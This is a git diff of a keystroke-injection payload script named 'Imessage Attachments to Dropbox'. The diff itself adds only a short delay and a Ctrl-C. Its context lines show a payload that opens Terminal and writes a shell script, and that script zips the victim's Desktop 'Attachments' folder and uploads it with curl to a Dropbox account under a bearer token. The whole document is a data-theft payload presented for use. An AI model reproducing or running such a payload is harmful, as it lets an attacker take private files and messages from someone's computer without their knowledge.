diff --git a/Executions/Imessage Attachments to Dropbox.txt b/Executions/Imessage Attachments to Dropbox.txt index 9b988a9..c0c94fc 100644 --- a/Executions/Imessage Attachments to Dropbox.txt +++ b/Executions/Imessage Attachments to Dropbox.txt @@ -45,6 +45,8 @@ DELAY 500 STRING terminal DELAY 1000 ENTER +DELAY 500 +CTRL c DELAY 1000 STRING echo 'cd ~/Desktop && zip -r attachments.zip Attachments && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/attachments.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @attachments.zip' > upload.sh DELAY 2000